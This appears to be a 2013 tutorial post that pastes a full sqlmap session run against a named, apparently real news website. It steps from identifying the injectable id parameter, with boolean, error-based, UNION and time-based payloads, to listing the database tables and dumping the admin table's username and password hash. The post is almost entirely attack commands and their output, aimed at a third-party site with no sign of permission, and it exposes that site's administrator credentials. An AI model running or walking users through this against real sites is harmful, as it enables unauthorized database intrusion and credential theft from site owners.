
sqlmap injection example against MySQL

Posted on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>